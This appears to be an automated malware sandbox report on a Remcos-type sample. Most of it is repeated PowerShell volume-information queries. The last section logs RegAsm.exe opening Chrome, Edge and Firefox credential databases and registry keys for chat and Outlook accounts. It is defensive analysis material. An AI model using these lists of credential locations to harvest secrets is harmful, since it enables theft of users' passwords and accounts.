                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\ VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00404F51 GetLocalTime,CreateEventA,CreateThread,11_2_00404F51
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041B69E GetComputerNameExW,GetUserNameW,11_2_0041B69E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,11_2_00449210
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0041739B GetVersionExW,13_2_0041739B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4545370630.00000000026AE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A5A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.4543306554.0000000000A8F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTR
                      Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data11_2_0040BA4D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: \key3.db11_2_0040BB6B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
